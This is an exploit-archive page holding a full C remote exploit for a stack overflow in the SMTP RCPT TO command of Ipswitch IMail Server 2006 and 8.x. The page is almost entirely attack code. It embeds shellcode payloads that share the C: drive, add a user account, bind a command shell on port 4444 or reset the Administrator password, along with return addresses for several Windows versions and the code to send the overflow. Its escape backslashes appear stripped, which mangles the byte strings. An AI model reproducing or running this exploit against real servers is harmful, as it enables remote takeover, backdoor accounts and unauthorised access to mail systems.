[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Ipswitch IMail Server 2006 / 8.x (RCPT) Remote Stack Overflow Exploit
# Published : 2006-10-19
# Author : Greg Linares
# Previous Title : SHTTPD 1.34 (POST) Remote Buffer Overflow Exploit
# Next Title : BulletProof FTP Client 2.45 Remote Buffer Overflow Exploit (PoC)
// IMail 2006 and 8.x SMTP Stack Overflow Exploit
// coded by Greg Linares [glinares.code[at]gmail[dot]com
// http://www.juniper.net/security/auto/vulnerabilities/vuln3414.html
// This works on the following versions:
// 2006 IMail prior to 2006.1 update
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>
#pragma comment(lib,"wsock32.lib")
int main(int argc, char *argv[])
{
static char overflow[1028];
// PAYLOADS
// Restricted Chars = 0x00 0x0D 0x0A 0x20 0x3e 0x22 (Maybe More)
/* win32_exec - EXITFUNC=seh CMD=net share Export=C: /unlimited Size=188 Encoder=ShikataGaNai http://metasploit.com */
unsigned char RootShare[] =
"xdbxcbx29xc9xbaxfaxefx47x2bxb1x2axd9x74x24xf4x58"
"x31x50x17x83xc0x04x03xaaxfcxa5xdexb6xebx6ex21x46"
"xecxe5x64x7ax67x85x63xfax76x99xe7xb5x60xeexa7x69"
"x90x1bx1exe2xa6x50xa0x1axf7xa6x3ax4ex7cxe6x49x89"
"xbcx2dxbcx94xfcx59x4bxadx54xbaxb0xa4xb1x49xe7x62"
"x3bxa5x7exe1x37x72xf4xaax5bx85xe1xdfx78x0exf4x34"
"x09x4cxd3xcexc9x5cxdbxaax46xdexebxb7x99xa7x07x3c"
"x59x54x93x32x46xc9x28xdax7exfax26x91xffx4cx38xa5"
"xffx27x51x99xa0x06x54x81x08xe0x60xc2x75x89xc0xac"
"x85xe4xe5x73x0ex61x1bx01xc0xc6x1bxf2xb3x8dx97xdc"
"x38x26x39x6exdax96xfcxf6x54xb8x8cx72xa8x05x4bx26"
"xf2xa6xdexb8x9exd1x4dx2dx2bx47xeaxad";
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=Pex http://metasploit.com */
unsigned char Win32Bind[] =
"x33xc9x83xe9xb0xe8xffxffxffxffxc0x5ex81x76x0ex93"
"x7bxbdx36x83xeexfcxe2xf4x6fx11x56x7bx7bx82x42xc9"
"x6cx1bx36x5axb7x5fx36x73xafxf0xc1x33xebx7ax52xbd"
"xdcx63x36x69xb3x7ax56x7fx18x4fx36x37x7dx4ax7dxaf"
"x3fxffx7dx42x94xbax77x3bx92xb9x56xc2xa8x2fx99x1e"
"xe6x9ex36x69xb7x7ax56x50x18x77xf6xbdxccx67xbcxdd"
"x90x57x36xbfxffx5fxa1x57x50x4ax66x52x18x38x8dxbd"
"xd3x77x36x46x8fxd6x36x76x9bx25xd5xb8xddx75x51x66"
"x6cxadxdbx65xf5x13x8ex04xfbx0cxcex04xccx2fx42xe6"
"xfbxb0x50xcaxa8x2bx42xe0xccxf2x58x50x12x96xb5x34"
"xc6x11xbfxc9x43x13x64x3fx66xd6xeaxc9x45x28xeex65"
"xc0x28xfex65xd0x28x42xe6xf5x13xacx6axf5x28x34xd7"
"x06x13x19x2cxe3xbcxeaxc9x45x11xadx67xc6x84x6dx5e"
"x37xd6x93xdfxc4x84x6bx65xc6x84x6dx5ex76x32x3bx7f"
"xc4x84x6bx66xc7x2fxe8xc9x43xe8xd5xd1xeaxbdxc4x61"
"x6cxadxe8xc9x43x1dxd7x52xf5x13xdex5bx1ax9exd7x66"
"xcax52x71xbfx74x11xf9xbfx71x4ax7dxc5x39x85xffx1b"
"x6dx39x91xa5x1ex01x85x9dx38xd0xd5x44x6dxc8xabxc9"
"xe6x3fx42xe0xc8x2cxefx67xc2x2axd7x37xc2x2axe8x67"
"x6cxabxd5x9bx4ax7ex73x65x6cxadxd7xc9x6cx4cx42xe6"
"x18x2cx41xb5x57x1fx42xe0xc1x84x6dx5ex63xf1xb9x69"
"xc0x84x6bxc9x43x7bxbdx36";
/* win32_adduser - PASS=Error EXITFUNC=seh USER=Error Size=236 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char AddUser[] =
"x2bxc9x83xe9xcbxd9xeexd9x74x24xf4x5bx81x73x13xb2"
"xe6xafx6ax83xebxfcxe2xf4x4ex0exebx6axb2xe6x24x2f"
"x8ex6dxd3x6fxcaxe7x40xe1xfdxfex24x35x92xe7x44x23"
"x39xd2x24x6bx5cxd7x6fxf3x1ex62x6fx1exb5x27x65x67"
"xb3x24x44x9ex89xb2x8bx6exc7x03x24x35x96xe7x44x0c"
"x39xeaxe4xe1xedxfaxaex81x39xfax24x6bx59x6fxf3x4e"
"xb6x25x9exaaxd6x6dxefx5ax37x26xd7x66x39xa6xa3xe1"
"xc2xfax02xe1xdaxeex44x63x39x66x1fx6axb2xe6x24x02"
"x8exb9x9ex9cxd2xb0x26x92x31x26xd4x3axdax16x25x6e"
"xedx8ex37x94x38xe8xf8x95x55x85xc2x0ex9cx83xd7x0f"
"x92xc9xccx4axdcx83xdbx4axc7x95xcax18x92xa3xddx18"
"xddx94x8fx2fxc0x94xc0x18x92xc9xeex2exf6xc6x89x4c"
"x92x88xcax1ex92x8axc0x09xd3x8axc8x18xddx93xdfx4a"
"xf3x82xc2x03xdcx8fxdcx1exc0x87xdbx05xc0x95x8fx2f"
"xc0x94xc0x18x92xc9xeex2exf6xe6xafx6a";
/* win32_exec - CMD=net user Administrator "p@ssw0rd" Size=187 Encoder=Pex http://metasploit.com */
unsigned char ChangeAdmin[] =
"x29xc9x83xe9xdaxe8xffxffxffxffxc0x5ex81x76x0ex74"
"xb8x4fxbax83xeexfcxe2xf4x88x50x0bxbax74xb8xc4xff"
"x48x33x33xbfx0cxb9xa0x31x3bxa0xc4xe5x54xb9xa4xf3"
"xffx8cxc4xbbx9ax89x8fx23xd8x3cx8fxcex73x79x85xb7"
"x75x7axa4x4ex4fxecx6bxbex01x5dxc4xe5x50xb9xa4xdc"
"xffxb4x04x31x2bxa4x4ex51xffxa4xc4xbbx9fx31x13x9e"
"x70x7bx7ex7ax10x33x0fx8axf1x78x37xb6xffxf8x43x31"
"x04xa4xe2x31x1cxb0xa4xb3xffx38xffxbax74xb8xc4xd2"
"x48xe7x7ex4cx14xeexc6x42xf7x78x34xeax1cx48xc5xbe"
"x2bxd0xd7x44xfexb6x18x45x93xd6x2axcex54xcdx3cxdf"
"x06x98x0bxc8x15xd3x2ax9ax5bxd9x2bxdex74xb8x4fxba";
WSADATA wsaData;
struct hostent *hp;
struct sockaddr_in sockin;
char buf[300], *check;
int sockfd, bytes;
int plen, i, JMP;
char *hostname;
unsigned short port;
printf("IMail 2006 and 8.x SMTP 'RCPT TO:' Stack Overflow Exploitn");
printf("Coded by Greg Linares < glinares.code [at] GMAIL [dot] com >n");
if (argc <= 1)
{
printf("Usage: %s [hostname] [port] <Payload> <JMP>n", argv[0]);
printf("Default port is 25 rn");
printf("==============================n");
printf("Payload Options: 1 = Defaultn");
printf("==============================n");
printf("1 = Share C:\ as 'Export' Sharen");
printf("2 = Add User 'Error' with Password 'Error'n");
printf("3 = Win32 Bind CMD to Port 4444n");
printf("4 = Change Administrator Password to 'p@ssw0rd'n");
printf("==============================n");
printf("JMP Options: 1 = Defaultn");
printf("==============================n");
printf("1 = IMAIL 8.x SMTPDLL.DLL [pop ebp, ret] 0x10036f71 n");
printf("2 = Win2003 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af n");
printf("3 = Win2003 SP0 English USER32.DLL [pop ebp, ret] 0x77d02289 n");
printf("4 = WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23 n");
printf("5 = WinXP SP1 - SP0 English USER32.DLL [pop ebp, ret] 0x71ab389c n");
printf("6 = Win2000 Universal English USER32.DLL [pop ebp, ret] 0x75021397 n");
printf("7 = Win2000 Universal French USER32.DLL [pop ebp, ret] 0x74fa1397 n");
printf("8 = Windows XP SP1 - SP2 German USER32.DLL [pop ebp, ret] 0x77d18c14 rn");
exit(0);
}
hostname = argv[1];
if (argv[2]) port = atoi(argv[2]);
else port = atoi("25");
if (argv[4]) JMP = atoi(argv[4]);
else JMP = atoi("1");
if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
{
fprintf(stderr, "Error setting up with WinSock v1.1n");
exit(-1);
}
hp = gethostbyname(hostname);
if (hp == NULL)
{
printf("ERROR: Uknown host %sn", hostname);
printf("%s",hostname);
exit(-1);
}
sockin.sin_family = hp->h_addrtype;
sockin.sin_port = htons(port);
sockin.sin_addr = *((struct in_addr *)hp->h_addr);
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
{
printf("ERROR: Socket Errorn");
exit(-1);
}
if ((connect(sockfd, (struct sockaddr *) &sockin,
sizeof(sockin))) == SOCKET_ERROR)
{
printf("ERROR: Connect Errorn");
closesocket(sockfd);
WSACleanup();
exit(-1);
}
printf("Connected to [%s] on port [%d], sending overflow....n",
hostname, port);
if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
{
printf("ERROR: Recv Errorn");
closesocket(sockfd);
WSACleanup();
exit(1);
}
/* wait for SMTP service welcome*/
buf[bytes] = '�';
check = strstr(buf, "220");
if (check == NULL)
{
printf("ERROR: NO response from SMTP servicen");
closesocket(sockfd);
WSACleanup();
exit(-1);
}
// JMP to EAX = Results in a Corrupted Stack
// so instead we POP EBP, RET to restore pointer and then return
// this causes code procedure to continue
/*
['IMail 8.x Universal', 0x10036f71 ],
['Windows 2003 SP1 English', 0x7c87d8af ],
['Windows 2003 SP0 English', 0x77d5c14c ],
['Windows XP SP2 English', 0x7c967e23 ],
['Windows XP SP1 English', 0x71ab389c ],
['Windows XP SP0 English', 0x71ab389c ],
['Windows 2000 Universal English', 0x75021397 ],
['Windows 2000 Universal French', 0x74fa1397],
['Windows XP SP1 - SP2 German', 0x77d18c14],
*/
char Exp[] = "RCPT TO: <@"; // This stores our JMP between the @ and :
char Win2k3SP1E[] = "xafxd8x87x7c:"; //Win2k3 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af
char WinXPSP2E[] = "x23x7ex96x7c:"; //WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23
char IMail815[] = "x71x6fx03x10:"; //IMAIL 8.15 SMTPDLL.DLL [pop ebp, ret] 0x10036f71
char Win2k3SP0E[] = "x4cxc1xd5x77:"; //Win2k3 SP0 English USER32.DLL [pop ebp, ret]0x77d5c14c
char WinXPSP2[] = "x23x7ex96x7c:"; //WinXP SP2 English USER32.DLL [pop ebp, ret] 0x7c967e23
char WinXPSP1[] = "x9cx38xabx71:"; //WinXP SP1 and 0 English U32 [pop ebp, ret]0x71ab389c
char Win2KE[] = "x97x31x02x75:"; //Win2k English All SPs [pop ebp, ret]0x75021397
char Win2KF[] = "x97x13xfax74:"; // As above except French Win2k [pop ebp, ret]0x74fa1397
char WinXPG[] = "x14x8cxd1x77:"; //WinXP SP1 - SP2 German U32 [pop ebp, ret]0x77d18c14
char tail[] = "SSS>n"; // This closes the RCPT cmd. Any characters work.
// Another overflow can be achieved by using an overly long buffer after RCPT TO: on 8.15 systems
// After around 560 bytes or so EIP gets overwritten. But this method is easier to exploit and it works
// On all versions from 8.x to 2006 (9.x?)
char StackS[] = "x81xc4xffxefxffxffx44"; // Stabolize Stack prior to payload.
memset(overflow, 0, 1028);
strcat(overflow, Exp);
if (JMP == 1)
{
printf("Using IMail 8.15 SMTDP.DLL JMPn");
strcat(overflow, IMail815);
} else if (JMP == 2)
{
printf("Using Win2003 SP1 NTDLL.DLL JMPn");
strcat(overflow, Win2k3SP1E);
} else if (JMP == 3)
{
printf("Using Win2003 SP0 USER32.DLL JMPn");
strcat(overflow, Win2k3SP0E);
} else if (JMP == 4)
{
printf("Using WinXP SP2 NTDLL.DLL JMPn");
strcat(overflow, WinXPSP2E);
} else if (JMP == 5)
{
printf("Using WinXP SP1 and SP0 USER32.DLL JMPn");
strcat(overflow, WinXPSP1);
} else if (JMP == 6)
{
printf("Using Win2000 Universal English USER32.DLL JMPn");
strcat(overflow, Win2KE);
} else if (JMP == 7)
{
printf("Using Win2000 Universal French USER32.DLL JMPn");
strcat(overflow, Win2KF);
} else if (JMP == 8)
{
printf("Using WinXP SP2 and SP1 German USER32.DLL JMPn");
strcat(overflow, WinXPG);
} else {
printf("Using IMail 8.15 SMTDP.DLL JMPn");
strcat(overflow, IMail815);
}
// Setup Payload Options
if (atoi(argv[3]) == 1)
{
printf("Using Root Share Payloadn");
plen = 544 - ((strlen(RootShare) + strlen(StackS)));
for (i=0; i<plen; i++){
strcat(overflow, "x90");
}
strcat(overflow, StackS);
strcat(overflow, RootShare);
} else if (atoi(argv[3]) == 2)
{
printf("Using Add User Payloadn");
plen = 544 - ((strlen(AddUser)+ strlen(StackS)));
for (i=0; i<plen; i++){
strcat(overflow, "x90");
}
strcat(overflow, StackS);
strcat(overflow, AddUser);
} else if (atoi(argv[3]) == 3)
{
printf("Using Win32 CMD Bind Payloadn");
plen = 544 - ((strlen(Win32Bind) + strlen(StackS)));
for (i=0; i<plen; i++){
strcat(overflow, "x90");
}
strcat(overflow, StackS);
strcat(overflow, Win32Bind);
} else if (atoi(argv[3]) == 4)
{
printf("Using Change Admin Password Payload (Pwd = 'p@ssw0rd')n");
plen = 544 - ((strlen(ChangeAdmin) + strlen(StackS)));
for (i=0; i<plen; i++){
strcat(overflow, "x90");
}
strcat(overflow, StackS);
strcat(overflow, ChangeAdmin);
} else
{
printf("Using Win32 CMD Bind Payloadn");
plen = 544 - ((strlen(Win32Bind) + strlen(StackS)));
for (i=0; i<plen; i++){
strcat(overflow, "x90");
}
strcat(overflow, StackS);
strcat(overflow, Win32Bind);
}
// Dont forget to add the trailing characters to set up stack overflow
strcat(overflow, tail);
// Connect to SMTP Server and Setup Up Email
char EHLO[] = "EHLO rn";
char MF[] = "MAIL FROM <TEST@TEST> rn";
send(sockfd, EHLO, strlen(EHLO), 0);
Sleep(1000);
send(sockfd, MF, strlen(MF), 0);
Sleep(1000);
if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)
{
printf("ERROR: Send Errorn");
closesocket(sockfd);
WSACleanup();
exit(-1);
}
printf("Exploit Sent.....rn");
if (atoi(argv[3]) == 3)
{
printf("Check Shell on Port 4444n");
closesocket(sockfd);
WSACleanup();
exit(0);
}
printf("Checking If Exploit Executed....rn");
Sleep(1000);
closesocket(sockfd);
sockin.sin_family = hp->h_addrtype;
sockin.sin_port = htons(port);
sockin.sin_addr = *((struct in_addr *)hp->h_addr);
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
{
printf("ERROR: Socket Errorn");
exit(-1);
}
if ((connect(sockfd, (struct sockaddr *) &sockin,
sizeof(sockin))) == SOCKET_ERROR)
{
printf("Exploit Successfully Delivered!n");
closesocket(sockfd);
WSACleanup();
printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!");
exit(0);
}
printf("...");
if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
{
printf("Exploit Successfully Delivered!n");
closesocket(sockfd);
WSACleanup();
printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!");
exit(0);
}
/* wait for SMTP service welcome*/
buf[bytes] = '�';
check = strstr(buf, "220");
if (check == NULL)
{
printf("Exploit Successfully Delivered!n");
closesocket(sockfd);
WSACleanup();
printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!");
exit(0);
}
printf("Exploit Failed: Try A different JMP Method or Payloadn");
closesocket(sockfd);
WSACleanup();
exit (1);
}
// www.Syue.com [2006-10-19]